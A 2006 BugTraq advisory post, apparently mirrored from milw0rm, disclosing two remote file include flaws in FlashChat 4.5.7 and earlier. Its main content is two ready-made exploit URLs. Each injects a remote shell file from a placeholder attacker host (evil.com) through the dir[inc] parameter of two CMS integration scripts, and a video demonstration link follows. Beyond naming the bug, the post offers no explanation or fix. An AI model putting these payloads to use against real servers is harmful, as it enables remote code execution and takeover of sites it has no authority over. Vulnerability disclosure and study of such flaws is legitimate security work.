BugTraq
FlashChat <= 4.5.7 Remote File Include Vulnerability Sep 04 2006 03:57PM
mc nadz gmail com
NeXtMaN <mc.nadz [at] gmail.com>

Here are 2 RFI vulnerabilities in Flashchat i've found:

Code:

http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http:/
/evil.com/shell.txt?

http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http:/
/evil.com/shell.txt?

video here:

Code:

http://rapidshare.de/files/31362430/Flashchat.rar.html

# milw0rm.com [2006-09-04]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus